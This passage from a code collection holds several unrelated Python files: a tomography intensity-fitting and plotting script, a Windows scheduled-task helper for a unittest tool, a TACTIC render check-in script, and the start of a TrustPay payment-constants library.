stdRes resultDict[key]['xLeft'] = xLeft resultDict[key]['yLeft'] = yLeft resultDict[key]['fitLeft'] = fitLeft resultDict[key]['xRight'] = xRight resultDict[key]['yRight'] = yRight resultDict[key]['fitRight'] = fitRight resultDict[key]['indexLargeLeft'] = indexLargeLeft resultDict[key]['indexLargeRight'] = indexLargeRight resultDict[key]['indexSmallLeft'] = indexSmallLeft resultDict[key]['indexSmallRight'] = indexSmallRight resultDict[key]['resLeft'] = resLeft resultDict[key]['resRight'] = resRight resultDict[key]['slopeLeft'] = slopeLeft resultDict[key]['interceptLeft'] = interceptLeft resultDict[key]['slopeRight'] = slopeRight resultDict[key]['interceptRight'] = interceptRight return resultDict def fitOneLinearRegression(thetaLinear, IntensityLinear, tiltanglesArray, options): if (len(tiltanglesArray)%2 == 1): halfN = int(len(tiltanglesArray)/2) + 1 xLeft, yLeft = thetaLinear[0:halfN], IntensityLinear[0:halfN] xRight, yRight = thetaLinear[halfN-1:], IntensityLinear[halfN-1:] else: halfN = int(len(tiltanglesArray)/2) xLeft, yLeft = thetaLinear[0:halfN], IntensityLinear[0:halfN] xRight, yRight = thetaLinear[halfN:], IntensityLinear[halfN:] slopeLeft, interceptLeft, r2Left = linearRegression(xLeft, yLeft) slopeRight, interceptRight, r2Right = linearRegression(xRight, yRight) assert(len(xLeft)==len(xRight)) fitLeft = slopeLeft*xLeft + interceptLeft fitRight = slopeRight*xRight + interceptRight #the sum of squared residuals resLeft = yLeft - fitLeft resLeft = resLeft / fitLeft #print "resLeft", resLeft resRight = yRight - fitRight resRight = resRight / fitRight #print "resRight", resRight fresLeft = sum(resLeft**2) fresRight = sum(resRight**2) fres = [fresLeft*1000000, fresRight*1000000] #find the points with the largest 3 residuals in left and right branches, use numpy.argpartition #N = options.largestNRes N=3 negN = (-1)*N indexLargeLeft = np.argpartition(resLeft**2, negN)[negN:] indexLargeRight = np.argpartition(resRight**2, negN)[negN:] M=3 #M = options.smallestNRes posM = M indexSmallLeft = np.argpartition(resLeft**2, posM)[:posM] indexSmallRight = np.argpartition(resRight**2, posM)[:posM] #MSE, under the assumption that the population error term has a constant variance, the estimate of that variance is given by MSE, mean square error #The denominator is the sample size reduced by the number of model parameters estimated from the same data, (n-p) for p regressors or (n-p-1) if an intercept is used. #In this case, p=1 so the denominator is n-2. 
    stdResLeft = np.std(resLeft, ddof=2)
    stdResRight = np.std(resRight, ddof=2)
    stdRes = [stdResLeft*1000, stdResRight*1000]

    ret = fres, stdRes, xLeft, yLeft, fitLeft, xRight, yRight, fitRight, indexLargeLeft, indexLargeRight, indexSmallLeft, indexSmallRight, resLeft, resRight, slopeLeft, interceptLeft, slopeRight, interceptRight
    return ret


def linearRegression(x, y):
    slope, intercept, r_value, p_value, std_err = stats.linregress(x, y)
    # To get slope, intercept and coefficient of determination (r_squared)
    return slope, intercept, r_value**2


def generateData2(dictionary, options):
    x0 = [int(x) for x in options.x0.split(',')]
    thetaLst = []
    intensityLst = []
    thetaLinearLst = []
    for theta, intensity in dictionary.iteritems():
        thetaLst.append(float(theta))
        intensityLst.append(intensity)
        cosAngle = math.cos((float(theta)/360.)*math.pi*2)
        tmp = (1./(cosAngle))
        thetaLinearLst.append(tmp)
    thetaArray = np.asarray(thetaLst)
    thetaLinearArray = np.asarray(thetaLinearLst)
    intensityArray = np.asarray(intensityLst)
    intensityLinearArray = np.log(intensityArray)
    return thetaArray, intensityArray, thetaLinearArray, intensityLinearArray


def plotOriginalData(dictionary, options):
    # plot the curve mode and log-ratio mode of original data
    thetaLst = []
    xlinearLst = []
    intensityLst = []
    for theta, intensity in dictionary.iteritems():
        thetaLst.append(float(theta))
        intensityLst.append(intensity)
        cosAngle = math.cos((float(theta)/360.)*math.pi*2)
        x = (1./(cosAngle))
        xlinearLst.append(x)
    xdata = np.asarray(thetaLst)
    ydata = np.asarray(intensityLst)
    ydataInv = ydata[::-1]
    #print xdata, ydata
    x0 = [int(x) for x in options.x0.split(',')]
    y0 = [int(x) for x in options.y0.split(',')]
    colors = ['b', 'r', 'g', 'c', 'm', 'y', 'k', 'b', 'r', 'g', 'c', 'm', 'y', 'k']
    markers = ['s', 'o', '^', 'v', 'x', '*', '+', 'd', 'D', '<', '>', 'p', '8', 'H']

    plt.figure(figsize=(12.5, 10))
    #plt.subplot(221)
    for i in range(len(x0)):
        boxPosition = '%g,%g'%(x0[i], y0[i])
        if (i < len(colors)):
            plt.plot(xdata, ydata[:, i], markers[i], label = boxPosition, markersize=5, color = colors[i])
        else:
            i = i - len(colors)
            plt.plot(xdata, ydata[:, i], markers[i], label = boxPosition, markersize=5, color = colors[i])
    plt.axvline(0, linestyle='--', color='k', linewidth=2.0)
    plt.xticks(fontsize = 20)
    plt.yticks(fontsize = 20)
    plt.legend(fontsize = 18)
    ax = plt.gca()
    ax.tick_params(pad = 10)
    plt.xlabel(r'$\theta$ ($^\circ$)', fontsize = 24, labelpad = 10)
    plt.ylabel('Intensity', fontsize = 24, labelpad = 10)
    #plt.xlim(-70, 70)
    plt.grid(True, linestyle = '--', alpha = 0.5)

    # plot the linear format (log-ratio mode) of original data
    xlinear = np.asarray(xlinearLst)
    ylinear = np.log(ydata)
    plt.figure(figsize=(12.5, 10))
    #plt.subplot(222)
    for i in range(len(x0)):
        boxPosition = '%g,%g'%(x0[i], y0[i])
        if (i < len(colors)):
            plt.plot(xlinear, ylinear[:, i], markers[i], label = boxPosition, markersize=5, color = colors[i])
        else:
            i = i - len(colors)
            plt.plot(xlinear, ylinear[:, i], markers[i], label = boxPosition, markersize=5, color = colors[i])
    plt.xticks(fontsize = 20)
    plt.yticks(fontsize = 20)
    plt.legend(fontsize = 18)
    ax = plt.gca()
    ax.tick_params(pad = 10)
    plt.xlabel(r'1/cos($\theta$)', fontsize = 24, labelpad = 10)
    plt.ylabel('ln(Intensity)', fontsize = 24, labelpad = 10)
    plt.grid(True, linestyle = '--', alpha = 0.5)
    plt.show()


def compareFitData(dictionary, tmp, options):
    thetaLst = []
    xlinearLst = []
    intensityLst = []
    for theta, intensity in dictionary.iteritems():
        thetaLst.append(float(theta))
        intensityLst.append(intensity)
        cosAngle = math.cos((float(theta)/360.)*math.pi*2)
        x = (1./(cosAngle))
        xlinearLst.append(x)
    xdata = np.asarray(thetaLst)
    ydata = np.asarray(intensityLst)
    ydataInv = ydata[::-1]
    #print xdata, ydata
    x0 = [int(x) for x in options.x0.split(',')]
    y0 = [int(x) for x in options.y0.split(',')]
    colors = ['b', 'r', 'g', 'c', 'm', 'y', 'k', 'b', 'r', 'g', 'c', 'm', 'y', 'k']
    markers = ['s', 'o', '^', 'v', 'x', '*', '+', 'd', 'D', '<', '>', 'p', '8', 'H']

    plt.figure(figsize=(25, 20))
    plt.subplots_adjust(left=None, bottom=None, right=None, top=None, wspace=0.4, hspace=0.4)

    # plot the curvilinear format of original data
    plt.subplot(221)
    for i in range(len(x0)):
        boxPosition = '%g,%g'%(x0[i], y0[i])
        if (i < len(colors)):
            plt.plot(xdata, ydata[:, i], markers[i], label = boxPosition, markersize=5, color = colors[i])
        else:
            i = i - len(colors)
            plt.plot(xdata, ydata[:, i], markers[i], label = boxPosition, markersize=5, color = colors[i])
    plt.axvline(0, linestyle='--', color='k', linewidth=2.0)
    plt.xticks(fontsize = 20)
    plt.yticks(fontsize = 20)
    plt.legend(fontsize = 18)
    ax = plt.gca()
    ax.tick_params(pad = 10)
    plt.xlabel(r'$\theta$ ($^\circ$)', fontsize = 24, labelpad = 10)
    plt.ylabel('Intensity', fontsize = 24, labelpad = 10)
    plt.title('Original: %s'%options.tiltseries)
    #plt.xlim(-70, 70)
    plt.grid(True, linestyle = '--', alpha = 0.5)

    # plot the linear format (log-ratio mode) of original data
    xlinear = np.asarray(xlinearLst)
    ylinear = np.log(ydata)
    #plt.figure(figsize=(12.5, 10))
    plt.subplot(222)
    for i in range(len(x0)):
        boxPosition = '%g,%g'%(x0[i], y0[i])
        if (i < len(colors)):
            plt.plot(xlinear, ylinear[:, i], markers[i], label = boxPosition, markersize=5, color = colors[i])
        else:
            i = i - len(colors)
            plt.plot(xlinear, ylinear[:, i], markers[i], label = boxPosition, markersize=5, color = colors[i])
    plt.xticks(fontsize = 20)
    plt.yticks(fontsize = 20)
    plt.legend(fontsize = 18)
    ax = plt.gca()
    ax.tick_params(pad = 10)
    plt.xlabel(r'1/cos($\theta$)', fontsize = 24, labelpad = 10)
    plt.ylabel('ln(Intensity)', fontsize = 24, labelpad = 10)
    plt.title('Original: %s'%options.tiltseries)
    plt.grid(True, linestyle = '--', alpha = 0.5)

    I0, d0, theta0, alpha0, A, B, MFP = tmp
    x0 = [int(x) for x in options.x0.split(',')]
    y0 = [int(x) for x in options.y0.split(',')]
    xfit = []
    yfit = []
    xdata = []
    xModified = []
    ydata = []
    ydataLinear = []
    I0Lst = []
    for theta, intensity in dictionary.iteritems():
        for i in range(len(intensity)):
            theta_i = float(theta) + theta0
            xModified.append(theta_i)
            #angle.append(theta_i)
            cosAngle = math.cos((float(theta)/360.)*math.pi*2)
            cosTheta = math.cos((theta_i/360.)*math.pi*2)
            cosAlpha = math.cos((alpha0/360.)*math.pi*2)
            intensityIn = math.log(I0)
            y = intensityIn - (1./(MFP * cosTheta * cosAlpha)) * d0
            yfit.append(y)
            #print intensity
            ######## which one is used as ydata in corrected plots
            y2 = math.log(intensity[i])
            #y2 = math.log(A * (intensity[i] - B))
            ydataLinear.append(y2)
            ydata.append(intensity[i])
            #x = (-1) * (1./(MFP * cosTheta * cosAlpha))
            x = (1./(cosTheta))
            xfit.append(x)
            #x2 = (-1) * (1./(MFP * cosAngle))
            x2 = (1./(cosAngle))
            xdata.append(x2)

    colors = ['b', 'r', 'g', 'c', 'm', 'y', 'k', 'b', 'r', 'g', 'c', 'm', 'y', 'k']
    markers = ['s', 'o', '^', 'v', 'x', '*', '+', 'd', 'D', '<', '>', 'p', '8', 'H']

    # plot the linear format (log-ratio mode) of fitted data after determination of parameters
    xfit = np.asarray(xfit)
    xfit2 = np.reshape(xfit, (nslices, len(x0)))
    yfit = np.asarray(yfit)
    yfit2 = np.reshape(yfit, (nslices, len(x0)))
    xdata = np.asarray(xdata)
    xdata2 = np.reshape(xdata, (nslices, len(x0)))
    ydataLinear = np.asarray(ydataLinear)
    ydataLinear2 = np.reshape(ydataLinear, (nslices, len(x0)))

    residuals = ydataLinear - yfit
    fres = sum(residuals**2)
    text_str = 'I0=%g\nd0=%g\ntheta0=%g\nalpha0=%g\ngain=%g\nB=%g\nMFP=%g\nres=%g'%(tmp[0], tmp[1], tmp[2], tmp[3], tmp[4], tmp[5], tmp[6], fres)

    plt.subplot(224)
    #plt.figure(figsize=(12.5, 10))
    for i in range(len(x0)):
        boxPosition = '%g,%g'%(x0[i], y0[i])
        plt.plot(xfit2[:, i], ydataLinear2[:, i], markers[i], label = boxPosition, markersize=5, color = colors[i])
    plt.xticks(fontsize = 20)
    plt.yticks(fontsize = 20)
    plt.legend(fontsize = 18)
    ax = plt.gca()
    ax.tick_params(pad = 10)
    #plt.plot(xfit, ydata, 'g^')
    plt.title('Least-squares fitting: %s'%options.tiltseries)
    plt.xlabel(r'1/cos($\theta$+$\theta_0$)', fontsize = 24, labelpad = 10)
    plt.ylabel('ln(Intensity)', fontsize = 24, labelpad = 10)
    plt.grid(True, linestyle = '--', alpha = 0.5)
    #plt.show()

    # plot the curvilinear format of fitted data after determination of parameters
    #xdata, xModified, ydata, yfit = fitDataCurve(dictionary, tmp)
    xdata = np.asarray(xdata)
    xdata2 = np.reshape(xdata, (nslices, len(x0)))
    xModified = np.asarray(xModified)
    xModified2 = np.reshape(xModified, (nslices, len(x0)))
    ydata = np.asarray(ydata)
    ydata2 = np.reshape(ydata, (nslices, len(x0)))
    ydata2Inv = ydata2[::-1]
    yfit = np.asarray(yfit)
    yfit2 = np.reshape(yfit, (nslices, len(x0)))

    residuals = ydata - yfit
    fres = sum(residuals**2)
    text_str = 'I0=%g\nd0=%g\ntheta0=%g\nalpha0=%g\ngain=%g\nB=%g\nMFP=%g\nres=%g'%(tmp[0], tmp[1], tmp[2], tmp[3], tmp[4], tmp[5], tmp[6], fres)

    #plt.plot(xModified2, yfit2, 'r--', linewidth=2.0)
    #plt.figure(figsize=(12.5, 10))
    plt.subplot(223)
    for i in range(len(x0)):
        boxPosition = '%g,%g'%(x0[i], y0[i])
        plt.plot(xModified2[:, i], ydata2[:, i], markers[i], label = boxPosition, markersize=5, color = colors[i])
    plt.axvline(0, linestyle='--', color='k', linewidth=2.0)
    plt.xticks(fontsize = 20)
    plt.yticks(fontsize = 20)
    plt.legend(fontsize = 18)
    ax = plt.gca()
    ax.tick_params(pad = 10)
    plt.title('Least-squares fitting: %s'%options.tiltseries)
    plt.xlabel(r'$\theta$+$\theta_0$ ($^\circ$)', fontsize = 24, labelpad = 10)
    plt.ylabel('Intensity', fontsize = 24, labelpad = 10)
    #plt.xlim(-70, 70)
    plt.grid(True, linestyle = '--', alpha = 0.5)

    pdfName = options.tiltseries.split('.')[0] + '_results.pdf'
    print pdfName
    with PdfPages(pdfName) as pdf:
        pdf.savefig()
        plt.close()
    #plt.show()


def calculateGamma0(theta0, alpha0):
    cosTheta0 = math.cos((theta0/360.)*math.pi*2)
    cosAlpha0 = math.cos((alpha0/360.)*math.pi*2)
    tanTheta0 = math.tan((theta0/360.)*math.pi*2)
    tanAlpha0 = math.tan((alpha0/360.)*math.pi*2)
    #tmp = 1./(cosTheta0 * cosTheta0 * cosAlpha0 * cosAlpha0) - tanTheta0 * tanTheta0 * tanAlpha0 * tanAlpha0
    tmp = tanTheta0 * tanTheta0 + tanAlpha0 * tanAlpha0 + 1
    cosGamma0 = math.pow(tmp, -0.5)
    gamma0 = math.acos(cosGamma0)*360./(math.pi*2)
    return gamma0


def optimizationFuncFullModel0(x):
    # use complete model
    I0, d0, theta0, alpha0, A, B, MFP = x
    #I0, d0, theta0, alpha0, B, MFP = x
    #A = 1
    cosTheta0 = math.cos((theta0/360.)*math.pi*2)
    cosAlpha0 = math.cos((alpha0/360.)*math.pi*2)
    tanTheta0 = math.tan((theta0/360.)*math.pi*2)
    tanAlpha0 = math.tan((alpha0/360.)*math.pi*2)
    #tmp = 1./(cosTheta0 * cosTheta0 * cosAlpha0 * cosAlpha0) - tanTheta0 * tanTheta0 * tanAlpha0 * tanAlpha0
    tmp = tanTheta0 * tanTheta0 + tanAlpha0 * tanAlpha0 + 1
    cosGamma0 = math.pow(tmp, -0.5)

    func = 0
    n = 0
    for theta, intensity in dictionary.iteritems():
        for i in range(len(intensity)):
            A = math.fabs(A)
            I0 = math.fabs(I0)
            intensityExit = math.log(A * (intensity[i] - B))
            intensityIn = math.log(I0)
            theta_i = float(theta) + theta0
            cosTheta = math.cos((theta_i/360.)*math.pi*2)
            #cosAlpha = math.cos((alpha0/360.)*math.pi*2)
            #err = intensityIn - (1./(MFP * cosTheta * cosAlpha)) * d0 - intensityExit
            err = intensityIn - (1./(MFP * cosTheta * cosGamma0)) * d0 * cosTheta0 - intensityExit
            func += err * err
            n += 1
    func = func/n
    return func


class MyBounds(object):
    def __init__(self, xmax = [], xmin = []):
        self.xmax = np.array(xmax)
        self.xmin = np.array(xmin)

    def __call__(self, **kwargs):
        x = kwargs["x_new"]
        tmax = bool(np.all(x <= self.xmax))
        tmin = bool(np.all(x >= self.xmin))
        return tmax and tmin


class MyTakeStep3(object):
    def __init__(self, stepsize=0.01):
        self.stepsize = stepsize

    def __call__(self, x):
        s = self.stepsize
        #p0 = [I0, d0, theta0, alpha0, A, B, MFP]
        x = np.float64(x)
        x[0] += np.random.uniform(-1000.*s, 1000.*s)
        x[1] += np.random.uniform(-10.*s, 10.*s)
        x[2] += np.random.uniform(-s, s)
        x[3] += np.random.uniform(-s, s)
        x[4] += np.random.uniform(-10.*s, 10.*s)
        x[5] += np.random.uniform(-100.*s, 100.*s)
        x[6] += np.random.uniform(-10.*s, 10.*s)
        return x


def flattenList(nestedLst):
    flattenLst = list(chain.from_iterable(nestedLst))
    return flattenLst


def blockMean(img, boxsizeX, boxsize):
    nx, ny = img.get_xsize(), img.get_ysize()
    nxBlock = int(nx/boxsizeX)
    nyBlock = int(ny/boxsize)
    #print nxBlock, nyBlock
    blockMeanValues = []
    for i in range(nxBlock):
        x0 = i*boxsizeX
        for j in range(nyBlock):
            y0 = j*boxsize
            r = Region(x0, y0, boxsizeX, boxsize)
            blkImg = img.get_clip(r)
            blockMeanValue = oneBlockMean(blkImg)
            blockMeanValues.append(blockMeanValue)
    return blockMeanValues


def oneBlockMean(img):
    nx, ny = img.get_xsize(), img.get_ysize()
    ary = EMNumPy.em2numpy(img)
    ary = reject_outliers(ary, m = 3)
    blkMean = np.mean(ary)
    blkSigma = np.std(ary)
    if (blkMean < 0):
        blkMean = blkMean * (-1)  # average pixel values must be positive
    if (blkMean > 30000):
        offset = float(options.addOffset)
        blkMean = blkMean + offset
    return blkMean


def reject_outliers(data, m=2):
    return data[abs(data - np.mean(data)) < m * np.std(data)]


if __name__ == "__main__":
    main()
gpl-2.0
-8,677,815,489,985,896,000
40.003778
266
0.6252
false
3.118391
false
false
false
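The script above fits tilt-series intensities to an exponential attenuation model; the linearization it relies on is that ln(I) is linear in 1/cos(theta). A minimal, self-contained sketch of that relationship (the parameter values are illustrative assumptions, not taken from the record):

import numpy as np
from scipy import stats

I0, d0, MFP = 3000.0, 100.0, 350.0          # assumed beam intensity, thickness, mean free path
theta = np.deg2rad(np.arange(-60, 61, 2))   # tilt angles
x = 1.0 / np.cos(theta)                     # the "1/cos(theta)" axis used in the plots above
y = np.log(I0) - (d0 / MFP) * x             # ln(intensity) under the attenuation model

slope, intercept, r, p, err = stats.linregress(x, y)
print(-slope * MFP)       # recovers d0 (100.0)
print(np.exp(intercept))  # recovers I0 (3000.0)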
masamitsu-murase/pausable_unittest
pausable_unittest/utils/winutils.py
1
1893
# coding: utf-8

import subprocess
import tempfile
import os


def register_schtasks(task_name, path, user, password=None, admin=True):
    command = ["schtasks.exe", "/Create", "/RU", user]
    if password:
        command += ["/RP", password]
    command += [
        "/SC", "ONLOGON", "/TN", task_name, "/TR", '"' + path + '"', "/F"
    ]
    if admin:
        command += ["/RL", "HIGHEST"]
    else:
        command += ["/RL", "LIMITED"]
    subprocess.check_output(command, stderr=subprocess.STDOUT)

    command = ["schtasks.exe", "/Query", "/TN", task_name, "/XML", "ONE"]
    xml = subprocess.check_output(command,
                                  stderr=subprocess.STDOUT,
                                  universal_newlines=True)
    xml = xml.replace(
        "<DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>",
        "<DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>")
    xml = xml.replace(
        "<StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>",
        "<StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>")
    with tempfile.NamedTemporaryFile(delete=False, mode="w") as xml_file:
        xml_file.write(xml)
        xml_file.close()
        xml_filename = xml_file.name
    try:
        command = [
            "schtasks.exe", "/Create", "/TN", task_name, "/F", "/XML",
            xml_filename
        ]
        if password:
            command += ["/RU", user, "/RP", password]
        subprocess.check_output(command, stderr=subprocess.STDOUT)
    finally:
        os.remove(xml_filename)


def unregister_schtasks(task_name):
    command = ["schtasks.exe", "/Delete", "/TN", task_name, "/F"]
    try:
        subprocess.check_output(command, stderr=subprocess.STDOUT)
    except subprocess.CalledProcessError as e:
        if e.returncode not in (0, 1):
            raise
mit
-6,031,662,333,350,813,000
32.418182
73
0.570523
false
3.675728
false
false
false
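A hypothetical usage sketch for the two helpers above (Windows only; requires schtasks.exe and sufficient privileges -- the task name and script path are made-up examples):

from pausable_unittest.utils import winutils

# Register a logon task that runs elevated and is not throttled by the
# battery-power settings (the XML rewrite performed above).
winutils.register_schtasks(task_name="pausable_unittest_runner",  # assumed name
                           path=r"C:\tests\run_tests.bat",        # assumed script
                           user="testuser",
                           password=None,  # pass one to set /RU and /RP explicitly
                           admin=True)
# Later, remove the logon task again:
winutils.unregister_schtasks("pausable_unittest_runner")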
listyque/TACTIC-Handler
thlib/side/client/examples/checkin_render_layer.py
1
4903
import sys, os, shutil, getopt
from tactic_client_lib import TacticServerStub

SEARCH_TYPE = "prod/render"


def move_file(file_paths, new_dir):
    '''move file to the handoff dir'''
    new_file_paths = []
    for file_path in file_paths:
        file_name = os.path.basename(file_path)
        new_file_path = '%s/%s' %(new_dir, file_name)
        shutil.move(file_path, new_file_path)
        '''
        while not os.path.exists(new_file_path):
            sys.stdout.write('.')
        '''
        new_file_paths.append(new_file_path)
    return new_file_paths


def expand_paths( file_path, file_range ):
    '''expands the file paths, replacing # as specified in the file_range'''
    file_paths = []
    # frame_by is not really used here yet
    frame_by = 1
    if file_range.find("/") != -1:
        file_range, frame_by = file_range.split("/")
    frame_start, frame_end = file_range.split("-")
    frame_start = int(frame_start)
    frame_end = int(frame_end)
    frame_by = int(frame_by)

    # find out the number of #'s in the path
    padding = len( file_path[file_path.index('#'):file_path.rindex('#')] )+1

    for i in range(frame_start, frame_end+1, frame_by):
        expanded = file_path.replace( '#'*padding, str(i).zfill(padding) )
        file_paths.append(expanded)
    return file_paths


def main(args, login=None):
    # USAGE: checkin_render_layer.py
    shot_code = args[0]
    layer_name = args[1]
    version = args[2]
    context = args[3]
    file_range = args[4]
    pattern = args[5]

    server = TacticServerStub(login)
    # do the actual work
    server.start("Checked in file group [%s] to shot [%s] layer [%s]" % (pattern, shot_code, layer_name))
    try:
        # move the file
        dir = server.get_handoff_dir()
        paths = expand_paths(pattern, file_range)
        move_file(paths, dir)
        file_name = os.path.basename(pattern)
        new_pattern = '%s/%s' % (dir, file_name)
        print("Files moved to handoff dir.\n")

        # checkin the moved files
        filters = []
        filters.append(('shot_code', shot_code))
        filters.append(('name', layer_name))
        results = server.query('prod/layer', filters)
        # take the first one
        if results:
            id = results[0].get('id')

        search_type = server.build_search_type('prod/layer')

        # find the layer snapshot
        filters = []
        filters.append(('version', version))
        filters.append(('search_type', search_type))
        filters.append(('search_id', id))
        #TODO : may need a context to search for the proper layer
        results = server.query('sthpw/snapshot', filters)
        snap_code = ''
        if results:
            snap_code = results[0].get('code')

        # find the render
        render = None
        filters = []
        filters.append(('search_type', search_type))
        filters.append(('search_id', id))
        filters.append(('snapshot_code', snap_code))
        results = server.query(SEARCH_TYPE, filters)
        if results:
            render = results[0]

        if not render:
            render_data = {
                'search_type': search_type,
                'search_id': id,
                'snapshot_code': snap_code
            }
            render = server.insert("prod/render", render_data)
        '''
        results = server.query(SEARCH_TYPE, filters)
        render_id = 0
        if results:
            render_id = results[0].get('id')

        # find the render id
        search_key = server.build_search_key(SEARCH_TYPE, render_id, column='id')
        '''
        file_type = 'main'
        # run group checkin
        server.group_checkin(render.get("__search_key__"), context=context,
                             file_path=new_pattern, file_type=file_type,
                             file_range=file_range)
    except:
        server.abort()
        raise
    else:
        server.finish()


if __name__ == '__main__':
    executable = sys.argv[0]
    #args = sys.argv[1:]
    login = None
    try:
        opts, args = getopt.getopt(sys.argv[1:], "l:h", ["login=","help"])
    except getopt.error as msg:
        print(msg)
        sys.exit(2)

    # process options
    for o, a in opts:
        if o in ("-l", "--login"):
            login = a
        if o in ("-h", "--help"):
            print("python checkin_render_layer.py <shot_code> <layer_name> <version> <context> <file_range> <file_pattern>")
            print("python checkin_render_layer.py S0001 layer1 1 lgt 1-20 D:/file_dir/plates.####.png")
            sys.exit(0)

    print(args, len(args))
    if len(args) != 6:
        print("python checkin_render_layer.py <shot_code> <layer_name> <version> <context> <file_range> <file_pattern>")
        print("python checkin_render_layer.py S0001 layer1 1 lgt 1-20 D:/file_dir/plates.####.png")
        sys.exit(2)

    main(args, login=login)
epl-1.0
7,825,519,813,304,723,000
31.686667
142
0.563533
false
3.563227
false
false
false
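For reference, expand_paths() above replaces the run of '#' characters with zero-padded frame numbers; a quick sketch of what it returns (assuming the module is importable as checkin_render_layer -- the import name is an assumption):

from checkin_render_layer import expand_paths

print(expand_paths("D:/file_dir/plates.####.png", "1-3"))
# ['D:/file_dir/plates.0001.png', 'D:/file_dir/plates.0002.png', 'D:/file_dir/plates.0003.png']
print(expand_paths("shot.##.exr", "8-12/2"))  # optional "/step" suffix
# ['shot.08.exr', 'shot.10.exr', 'shot.12.exr']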
beezz/trustpaylib
trustpaylib.py
1
17356
# -*- coding: utf-8 -*- # vim:fenc=utf-8 """ trustpaylib =========== TrustPay payment solution constants and utils. """ import sys import hmac import hashlib import collections try: unicode from urllib import urlencode except NameError: def unicode(s): return s from urllib.parse import urlencode #: Default test service url (TrustCard doesn't have testing service) TEST_API_URL = "https://ib.test.trustpay.eu/mapi/pay.aspx" #: TrustPay service url. API_URL = "https://ib.trustpay.eu/mapi/pay.aspx" #: TrustCard service url. TRUSTCARD_API_URL = "https://ib.trustpay.eu/mapi/cardpayments.aspx" __currencies = ( "CZK", "EUR", "GBP", "HUF", "PLN", "USD", "RON", "BGN", "HRK", "LTL", "TRY", ) #: Supported currencies. CURRENCIES = collections.namedtuple( "TrustPayCurrencies", __currencies, )(*__currencies) __languages = ( "bg", "bs", "cs", "de", "en", "es", "et", "hr", "hu", "it", "lt", "lv", "pl", "ro", "ru", "sk", "sl", "sr", "uk", ) #: Suported languages. LANGUAGES = collections.namedtuple( "TrustPayLanguages", __languages, )(*__languages) __countries = ( "CZ", "HU", "PL", "SK", "EE", "BG", "RO", "HR", "LV", "LT", "SI", "TR", "FI", ) __countries_verbose = ( "Czech Republic", "Hungary", "Poland", "Slovak Republic", "Estonia", "Bulgaria", "Romania", "Croatia", "Latvia", "Lithuania", "Slovenia", "Turkey", "Finland", ) #: Supported countries COUNTRIES = collections.namedtuple( "TrustPayCountries", __countries, )(*__countries) #: Supported countries verbose version. COUNTRIES_VERBOSE = collections.namedtuple( "TrustPayCountriesVerbose", __countries, )(*__countries_verbose) __ResultCodes = collections.namedtuple( "TrustPayResultCodes", [ "SUCCESS", "PENDING", "ANNOUNCED", "AUTHORIZED", "PROCESSING", "AUTHORIZED_ONLY", "INVALID_REQUEST", "UNKNOWN_ACCOUNT", "MERCHANT_ACCOUNT_DISABLED", "INVALID_SIGN", "USER_CANCEL", "INVALID_AUTHENTICATION", "DISPOSABLE_BALANCE", "SERVICE_NOT_ALLOWED", "PAYSAFECARD_TIMEOUT", "GENERAL_ERROR", "UNSUPPORTED_CURRENCY_CONVERSION", ] ) #: Result codes of redirects and notifications. RESULT_CODES = __ResultCodes( "0", "1", "2", "3", "4", "5", "1001", "1002", "1003", "1004", "1005", "1006", "1007", "1008", "1009", "1100", "1101", ) __rc_desc = collections.namedtuple( "TrustPayResultCodesDesc", ["short", "long"], ) #: Result codes of redirects and notifications. #: In verbose form with short and long description of result code. RESULT_CODES_DESC = { RESULT_CODES.SUCCESS: __rc_desc( "Success", "Payment was successfully processed.", ), RESULT_CODES.PENDING: __rc_desc( "Pending", "Payment is pending (offline payment)", ), RESULT_CODES.ANNOUNCED: __rc_desc( "Announced", ( "TrustPay has been notified that the client" "placed a payment order or has made payment," " but further confirmation from 3rd party is needed." ), ), RESULT_CODES.AUTHORIZED: __rc_desc( "Authorized", ( "Payment was successfully authorized. Another" " notification (with result code 0 - success)" " will be sent when TrustPay receives and processes" " payment from 3rd party." ), ), RESULT_CODES.PROCESSING: __rc_desc( "Processing", ( "TrustPay has received the payment, but it" " must be internally processed before it is" " settled on the merchant‘s account." ), ), RESULT_CODES.AUTHORIZED_ONLY: __rc_desc( "Authorized only", ( "Card payment was successfully authorized," " but not captured. Subsequent MAPI call(s)" " is (are) required to capture payment." 
), ), RESULT_CODES.INVALID_REQUEST: __rc_desc( "Invalid request", "Data sent is not properly formatted.", ), RESULT_CODES.UNKNOWN_ACCOUNT: __rc_desc( "Unknown account", "Account with specified ID was not found.", ), RESULT_CODES.MERCHANT_ACCOUNT_DISABLED: __rc_desc( "Merchant's account disabled", "Merchant's account has been disabled.", ), RESULT_CODES.INVALID_SIGN: __rc_desc( "Invalid sign", "The message is not signed correctly.", ), RESULT_CODES.USER_CANCEL: __rc_desc( "User cancel", "Customer has cancelled the payment.", ), RESULT_CODES.INVALID_AUTHENTICATION: __rc_desc( "Invalid authentication", "Request was not properly authenticated", ), RESULT_CODES.DISPOSABLE_BALANCE: __rc_desc( "Disposable balance", "Requested transaction amount is greater than disposable balance.", ), RESULT_CODES.SERVICE_NOT_ALLOWED: __rc_desc( "Service not allowed", ( "Service cannot be used or permission to" " use given service has not been granted." ), ), RESULT_CODES.PAYSAFECARD_TIMEOUT: __rc_desc( "PaySafeCard timeout", "Cards allocation will be cancelled.", ), RESULT_CODES.GENERAL_ERROR: __rc_desc( "General Error", "Internal error has occurred.", ), RESULT_CODES.UNSUPPORTED_CURRENCY_CONVERSION: __rc_desc( "Unsupported currency conversion", "Currency conversion for requested currencies is not supported.", ), } #: TrustPay environment class #: Just attributes holder for TrustPay's variables. TrustPayEnvironment = collections.namedtuple( "TrustPayEnvironment", [ "api_url", "redirect_url", "success_url", "error_url", "cancel_url", "notification_url", "aid", "secret_key", "currency", "language", "country", ], ) TrustPayRequest = collections.namedtuple( "TrustPayRequest", [ "AID", "AMT", "CUR", "REF", "URL", "RURL", "CURL", "EURL", "NURL", "SIG", "LNG", "CNT", "DSC", "EMA", ], ) TrustPayNotification = collections.namedtuple( "TrustPayNotification", [ "AID", "TYP", "AMT", "CUR", "REF", "RES", "TID", "OID", "TSS", "SIG", ], ) TrustPayRedirect = collections.namedtuple( "TrustPayRedirect", ["REF", "RES", "PID"], ) def _build_nt_cls( cls, kw, fnc=lambda v: v if v is None else unicode(v), ): _kw = kw.copy() inst = cls(*[fnc(_kw.pop(attr, None)) for attr in cls._fields]) if _kw: raise ValueError("Got unexpected field names: %r" % _kw.keys()) return inst 